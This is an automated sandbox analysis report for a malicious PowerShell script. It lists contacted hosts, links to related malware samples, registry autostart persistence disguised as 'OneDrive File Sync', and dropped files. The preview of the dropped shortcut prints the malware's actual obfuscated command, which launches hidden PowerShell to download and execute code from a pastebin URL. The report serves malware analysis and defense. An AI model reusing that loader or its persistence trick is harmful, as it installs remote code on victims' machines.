                                                      http://pastebin.compowershell.exe, 00000008.00000002.1868322468.000001D61F478000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1868322468.000001D61F748000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1868322468.000001D61F72C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1945694039.000001F8C710E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1945694039.000001F8C7128000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1945694039.000001F8C6BB8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		unknown
                                                        https://pastebin.compowershell.exe, 00000008.00000002.1868322468.000001D61F734000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1945694039.000001F8C7118000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		unknown
                                                          https://raw.githubusercontent.comPpowershell.exe, 0000000C.00000002.1945694039.000001F8C714F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		unknown

                                                            World Map of Contacted IPs

                                                            • No. of IPs < 25%
                                                            • 25% < No. of IPs < 50%
                                                            • 50% < No. of IPs < 75%
                                                            • 75% < No. of IPs

                                                            Public IPs

                                                            IPDomainCountryFlagASNASN NameMalicious
                                                            172.67.19.24
                                                            		pastebin.comUnited States
                                                            		13335CLOUDFLARENETUStrue
                                                            162.159.128.233
                                                            		discord.comUnited States
                                                            		13335CLOUDFLARENETUStrue
                                                            185.199.110.133
                                                            		raw.githubusercontent.comNetherlands
                                                            		54113FASTLYUStrue

                                                            General Information

                                                            Joe Sandbox version:41.0.0 Charoite
                                                            Analysis ID:1534236
                                                            Start date and time:2024-10-15 18:07:50 +02:00
                                                            Joe Sandbox product:CloudBasic
                                                            Overall analysis duration:0h 5m 37s
                                                            Hypervisor based Inspection enabled:false
                                                            Report type:full
                                                            Cookbook file name:default.jbs
                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                            Number of analysed new started processes analysed:16
                                                            Number of new started drivers analysed:0
                                                            Number of existing processes analysed:0
                                                            Number of existing drivers analysed:0
                                                            Number of injected processes analysed:0
                                                            Technologies:
                                                            • HCA enabled
                                                            • EGA enabled
                                                            • AMSI enabled
                                                            Analysis Mode:default
                                                            Analysis stop reason:Timeout
                                                            Sample name:cr_asm_phshop..ps1
                                                            Detection:MAL
                                                            Classification:mal84.troj.evad.winPS1@16/15@4/3
                                                            EGA Information:
                                                            • Successful, ratio: 50%
                                                            HCA Information:
                                                            • Successful, ratio: 68%
                                                            • Number of executed functions: 14
                                                            • Number of non-executed functions: 2
                                                            Cookbook Comments:
                                                            • Found application associated with file extension: .ps1

                                                            Warnings

                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                            • Execution Graph export aborted for target powershell.exe, PID 3552 because it is empty
                                                            • Not all processes where analyzed, report is missing behavior information
                                                            • VT rate limit hit for: cr_asm_phshop..ps1

                                                            Simulations

                                                            Behavior and APIs

                                                            TimeTypeDescription
                                                            12:08:55API Interceptor354x Sleep call for process: powershell.exe modified
                                                            18:08:59AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run OneDrive File Sync "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"
                                                            18:09:07AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run OneDrive File Sync "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"

                                                            Joe Sandbox View / Context

                                                            IPs

                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            172.67.19.24VvPrGsGGWH.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                            • pastebin.com/raw/sA04Mwk2
                                                            HQsitBLlOv.dllGet hashmaliciousUnknownBrowse
                                                            • pastebin.com/raw/sA04Mwk2
                                                            xK44OOt7vD.exeGet hashmaliciousUnknownBrowse
                                                            • pastebin.com/raw/sA04Mwk2
                                                            steamcodegenerator.exeGet hashmaliciousUnknownBrowse
                                                            • pastebin.com/raw/sA04Mwk2
                                                            cr_asm_hiddenz.ps1Get hashmaliciousAsyncRAT, XWormBrowse
                                                            • pastebin.com/raw/sA04Mwk2
                                                            BeginSync lnk.lnkGet hashmaliciousUnknownBrowse
                                                            • pastebin.com/raw/sA04Mwk2
                                                            cr_asm_crypter.ps1Get hashmaliciousUnknownBrowse
                                                            • pastebin.com/raw/sA04Mwk2
                                                            steamcodegenerator.exeGet hashmaliciousUnknownBrowse
                                                            • pastebin.com/raw/sA04Mwk2
                                                            cr_asm.ps1Get hashmaliciousUnknownBrowse
                                                            • pastebin.com/raw/sA04Mwk2
                                                            envifa.vbsGet hashmaliciousUnknownBrowse
                                                            • pastebin.com/raw/V9y5Q5vv
                                                            162.159.128.233file.exeGet hashmaliciousLummaC, Glupteba, PureLog Stealer, RisePro Stealer, SmokeLoader, Stealc, zgRATBrowse
                                                            • discord.com/phpMyAdmin/

                                                            Domains

                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            pastebin.comgabe.ps1Get hashmaliciousUnknownBrowse
                                                            • 104.20.3.235
                                                            cr_asm.ps1Get hashmaliciousUnknownBrowse
                                                            • 104.20.3.235
                                                            cr_asm_atCAD.ps1Get hashmaliciousUnknownBrowse
                                                            • 104.20.3.235
                                                            cr_asm_crypter.ps1Get hashmaliciousUnknownBrowse
                                                            • 104.20.4.235
                                                            vF20HtY4a4.exeGet hashmaliciousUnknownBrowse
                                                            • 104.20.3.235
                                                            vF20HtY4a4.exeGet hashmaliciousUnknownBrowse
                                                            • 104.20.4.235
                                                            VvPrGsGGWH.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                            • 172.67.19.24
                                                            OSLdZanXNc.exeGet hashmaliciousUnknownBrowse
                                                            • 104.20.3.235
                                                            5UIy3bo46y.dllGet hashmaliciousUnknownBrowse
                                                            • 104.20.3.235
                                                            HQsitBLlOv.dllGet hashmaliciousUnknownBrowse
                                                            • 104.20.4.235
                                                            raw.githubusercontent.comgabe.ps1Get hashmaliciousUnknownBrowse
                                                            • 185.199.109.133
                                                            aidjBV.ps1Get hashmaliciousUnknownBrowse
                                                            • 185.199.110.133
                                                            cr_asm.ps1Get hashmaliciousUnknownBrowse
                                                            • 185.199.108.133
                                                            cr_asm_atCAD.ps1Get hashmaliciousUnknownBrowse
                                                            • 185.199.110.133
                                                            cr_asm_crypter.ps1Get hashmaliciousUnknownBrowse
                                                            • 185.199.111.133
                                                            na.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                            • 185.199.109.133
                                                            65567 DHL 647764656798860.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                            • 185.199.109.133
                                                            Request for Order Confirmation.jsGet hashmaliciousUnknownBrowse
                                                            • 185.199.110.133
                                                            RrEf8Rui72.exeGet hashmaliciousUnknownBrowse
                                                            • 185.199.109.133
                                                            Untitled_15-10-04.xlsGet hashmaliciousRemcosBrowse
                                                            • 185.199.108.133
                                                            discord.comgabe.ps1Get hashmaliciousUnknownBrowse
                                                            • 162.159.137.232
                                                            aidjBV.ps1Get hashmaliciousUnknownBrowse
                                                            • 162.159.135.232
                                                            cr_asm.ps1Get hashmaliciousUnknownBrowse
                                                            • 162.159.138.232
                                                            cr_asm_atCAD.ps1Get hashmaliciousUnknownBrowse
                                                            • 162.159.136.232
                                                            cr_asm_crypter.ps1Get hashmaliciousUnknownBrowse
                                                            • 162.159.128.233
                                                            vF20HtY4a4.exeGet hashmaliciousUnknownBrowse
                                                            • 162.159.136.232
                                                            vF20HtY4a4.exeGet hashmaliciousUnknownBrowse
                                                            • 162.159.136.232
                                                            VvPrGsGGWH.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                            • 162.159.138.232
                                                            OSLdZanXNc.exeGet hashmaliciousUnknownBrowse
                                                            • 162.159.137.232
                                                            5UIy3bo46y.dllGet hashmaliciousUnknownBrowse
                                                            • 162.159.128.233

                                                            ASNs

                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            CLOUDFLARENETUSgabe.ps1Get hashmaliciousUnknownBrowse
                                                            • 104.20.4.235
                                                            aidjBV.ps1Get hashmaliciousUnknownBrowse
                                                            • 162.159.135.232
                                                            file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                            • 104.21.53.8
                                                            cr_asm.ps1Get hashmaliciousUnknownBrowse
                                                            • 162.159.138.232
                                                            cr_asm_atCAD.ps1Get hashmaliciousUnknownBrowse
                                                            • 162.159.136.232
                                                            cr_asm_crypter.ps1Get hashmaliciousUnknownBrowse
                                                            • 162.159.135.232
                                                            cyCsE47YV3.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 188.114.96.3
                                                            na.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 188.114.96.3
                                                            RemotePCViewer.exeGet hashmaliciousUnknownBrowse
                                                            • 172.67.37.123
                                                            https://ghgeacb.r.bh.d.sendibt3.com/tr/cl/9i6x1nV2FKKN7vq8mr3OOEBBJCa885_P6VOZmrd6IAYZGxQqgx9-g2thnbfEyM7jcWMQq10DSkzoGE3hrRIOhqWmDMPB-v-Vs_HL2v8poWMBuT3diKJIsJCPnKr9QKNE7_LQcdnWzzdGVm3zkkF8zFTuvWpKy9uYId6Fqvw2hXfQsOcPQhS-r0DxYjl5NQ8-Qb21PAbLEM_Rbhi2eb4YBhrAe2x12cQGxRcawRCOj3pfpwGLu7SYcJdrZL0t9GyigTigzg3YlzmaeYqZCQsLc2qAheh9wzUxvwGet hashmaliciousUnknownBrowse
                                                            • 188.114.96.3
                                                            CLOUDFLARENETUSgabe.ps1Get hashmaliciousUnknownBrowse
                                                            • 104.20.4.235
                                                            aidjBV.ps1Get hashmaliciousUnknownBrowse
                                                            • 162.159.135.232
                                                            file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                            • 104.21.53.8
                                                            cr_asm.ps1Get hashmaliciousUnknownBrowse
                                                            • 162.159.138.232
                                                            cr_asm_atCAD.ps1Get hashmaliciousUnknownBrowse
                                                            • 162.159.136.232
                                                            cr_asm_crypter.ps1Get hashmaliciousUnknownBrowse
                                                            • 162.159.135.232
                                                            cyCsE47YV3.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 188.114.96.3
                                                            na.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 188.114.96.3
                                                            RemotePCViewer.exeGet hashmaliciousUnknownBrowse
                                                            • 172.67.37.123
                                                            https://ghgeacb.r.bh.d.sendibt3.com/tr/cl/9i6x1nV2FKKN7vq8mr3OOEBBJCa885_P6VOZmrd6IAYZGxQqgx9-g2thnbfEyM7jcWMQq10DSkzoGE3hrRIOhqWmDMPB-v-Vs_HL2v8poWMBuT3diKJIsJCPnKr9QKNE7_LQcdnWzzdGVm3zkkF8zFTuvWpKy9uYId6Fqvw2hXfQsOcPQhS-r0DxYjl5NQ8-Qb21PAbLEM_Rbhi2eb4YBhrAe2x12cQGxRcawRCOj3pfpwGLu7SYcJdrZL0t9GyigTigzg3YlzmaeYqZCQsLc2qAheh9wzUxvwGet hashmaliciousUnknownBrowse
                                                            • 188.114.96.3

                                                            JA3 Fingerprints

                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            3b5074b1b5d032e5620f69f9f700ff0egabe.ps1Get hashmaliciousUnknownBrowse
                                                            • 172.67.19.24
                                                            • 185.199.110.133
                                                            • 162.159.128.233
                                                            aidjBV.ps1Get hashmaliciousUnknownBrowse
                                                            • 172.67.19.24
                                                            • 185.199.110.133
                                                            • 162.159.128.233
                                                            cr_asm.ps1Get hashmaliciousUnknownBrowse
                                                            • 172.67.19.24
                                                            • 185.199.110.133
                                                            • 162.159.128.233
                                                            cr_asm_atCAD.ps1Get hashmaliciousUnknownBrowse
                                                            • 172.67.19.24
                                                            • 185.199.110.133
                                                            • 162.159.128.233
                                                            cr_asm_crypter.ps1Get hashmaliciousUnknownBrowse
                                                            • 172.67.19.24
                                                            • 185.199.110.133
                                                            • 162.159.128.233
                                                            na.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                            • 172.67.19.24
                                                            • 185.199.110.133
                                                            • 162.159.128.233
                                                            cyCsE47YV3.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 172.67.19.24
                                                            • 185.199.110.133
                                                            • 162.159.128.233
                                                            z7NLXIia8r.exeGet hashmaliciousScreenConnect ToolBrowse
                                                            • 172.67.19.24
                                                            • 185.199.110.133
                                                            • 162.159.128.233
                                                            wbxZk3AvuB.exeGet hashmaliciousScreenConnect ToolBrowse
                                                            • 172.67.19.24
                                                            • 185.199.110.133
                                                            • 162.159.128.233
                                                            3ckUhKW8W6.exeGet hashmaliciousScreenConnect ToolBrowse
                                                            • 172.67.19.24
                                                            • 185.199.110.133
                                                            • 162.159.128.233

                                                            Dropped Files

                                                            No context

                                                            Created / dropped Files

                                                            C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has command line arguments, Archive, ctime=Sat May 7 04:20:03 2022, mtime=Mon Sep 9 22:58:05 2024, atime=Sat May 7 04:20:03 2022, length=69632, window=hidenormalshowminimized
                                                            Category:dropped
                                                            Size (bytes):1728
                                                            Entropy (8bit):4.527272298423835
                                                            Encrypted:false
                                                            SSDEEP:24:8MBsCCbRKrzcAJBkr+/4MsPsiqxlD2uxmCnBuG4aVlilzXQaR3+hab/Ia7/OB+/q:8zD6JUUPx2uxFu+LozXv3KabINBY0
                                                            MD5:724AA21828AD912CB466E3B0A79F478B
                                                            SHA1:41B80A72CE8C2F1F54C1E595872D7ECD63D637CD
                                                            SHA-256:D675147502CF2CA50BC4EC9A0D95DED0A5A8861BEC3D24FCD9EDD3F4B5718E70
                                                            SHA-512:B88218356ABF805B4263B0960DC6D0FBEC47E2135FA74839449CA860F727D54A1014062C9E7DB0652E81C635C8C0C177B47326DADAF3AE34ED058FA085F1E98C
                                                            Malicious:true
                                                            Reputation:moderate, very likely benign file
                                                            Preview:L..................F.... ...|%h..a.........|%h..a..........................E....P.O. .:i.....+00.../C:\...................V.1......Y..0.Windows.@......T,*)Y................................W.i.n.d.o.w.s.....Z.1.....$Yh...System32..B......T,*)Y......L_.....................!.S.y.s.t.e.m.3.2.....f.2......T.* .forfiles.exe..J......T.*)Y.....A...........t..........t..f.o.r.f.i.l.e.s...e.x.e.......V...............4.......U...........`8......Windows.C:\Windows\System32\forfiles.exe..&.....\.....\.....\.W.i.n.d.o.w.s.\.S.y.s.t.e.m.3.2.\.f.o.r.f.i.l.e.s...e.x.e.../.p. .c.:.\.w.i.n.d.o.w.s.\.s.y.s.t.e.m.3.2. ./.m. .n.o.t.e.p.a.d...e.x.e. ./.c. .".p.o.w.e.r.s.h.e.l.l...e.x.e. .-.c.o.m.m.a.n.d. .p.o.w.e.r.s.h.e.l.l. .-.w.i.n.d.o.w.s.t.y.l.e. .h. .-.c.o.m.m.a.n.d. .'.s.a.l. .f.a.t.b.a.k.e. .c.a.l.c.;.s.a.l. .c.a.l.l.i.t. .i.E.x.;. .s.a.l. .$.e.n.v.:.o.s. .i.W.r.;. .c.a.l.l.i.T.(.W.I.N.D.O.W.S._.N.T. .p.a.s.t.e.b.i.n...c.o.m./.r.a.w./.s.A.0.4.M.w.k.2. .-.u.s.e.b.a.s.i.c.p.a.r.s.i.n.g.).'."..

                                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):11608
                                                            Entropy (8bit):4.890472898059848
                                                            Encrypted:false
                                                            SSDEEP:192:6xoe5qpOZxoe54ib4ZVsm5emdqVFn3eGOVpN6K3bkkjo5OgkjDt4iWN3yBGHVQ9R:9rib4ZmVoGIpN6KQkj2Fkjh4iUxsT6YP
                                                            MD5:8A4B02D8A977CB929C05D4BC2942C5A9
                                                            SHA1:F9A6426CAF2E8C64202E86B07F1A461056626BEA
                                                            SHA-256:624047EB773F90D76C34B708F48EA8F82CB0EC0FCF493CA2FA704FCDA7C4B715
                                                            SHA-512:38697525814CDED7B27D43A7B37198518E295F992ECB255394364EC02706443FB3298CBBAA57629CCF8DDBD26FD7CAAC44524C4411829147C339DD3901281AC2
                                                            Malicious:false
                                                            Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

                                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):64
                                                            Entropy (8bit):1.1940658735648508
                                                            Encrypted:false
                                                            SSDEEP:3:NlllulBlXlZ:NllU
                                                            MD5:9FD4162C117D903BC01C5147DCD4D66F
                                                            SHA1:D9972ECD03E4D9E5C5BF74946BF2A323CE8D39AB
                                                            SHA-256:B3E9AB27A6400CB8A8D767AE156B6C18C6003D4272380E68F363E5ACACCD7D18
                                                            SHA-512:C21BEF80F5633CCEEEAFF362F65A93EF76D6ACCE546B892847BDA3B1E4B60362125B3AE220C190F5BBC906BA7BA6761508405306C18F05E7999666F9BAF44185
                                                            Malicious:false
                                                            Preview:@...e...............................[..".............@..........

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0smsjsow.bav.ps1

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1pf0mrri.bk5.ps1

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2s5ikz4p.30t.ps1

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3nqjdews.gsq.psm1

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dpllssyi.mqs.psm1

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_j45bhiff.sir.psm1

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_niqfpzwe.e0p.psm1

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_py4bfmn5.gl0.psm1

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_r1x0sq1g.ja3.ps1

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rimvnmpl.3va.ps1

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):6222
                                                            Entropy (8bit):3.713765270714863
                                                            Encrypted:false
                                                            SSDEEP:48:tJRQ1RFCPWU23t/ukvhkvklCywXtzRyeil1ESogZoPxTRyeil+ESogZoPF1:HSFCPP8MkvhkvCCtX7yeiRH6vyeiEH6D
                                                            MD5:DEBCBC9652955F6D7D48FDE96EFE302D
                                                            SHA1:EC30BE6AD650BB207B1F8E632685EE0E5545E910
                                                            SHA-256:96DFE2071F5D29D6B8CF4C7B4DABBB93470312D6B9B1B711BAB877B645B4897F
                                                            SHA-512:130DE66B2B33A6588B0FDE8E713A64D96E2A045702A2BA3062C98ABE1FA3D2F0123D46391E434E6D770F1EBF6CD436F0A4AE12BE2DF7CEAA684DB6B1EF747883
                                                            Malicious:false
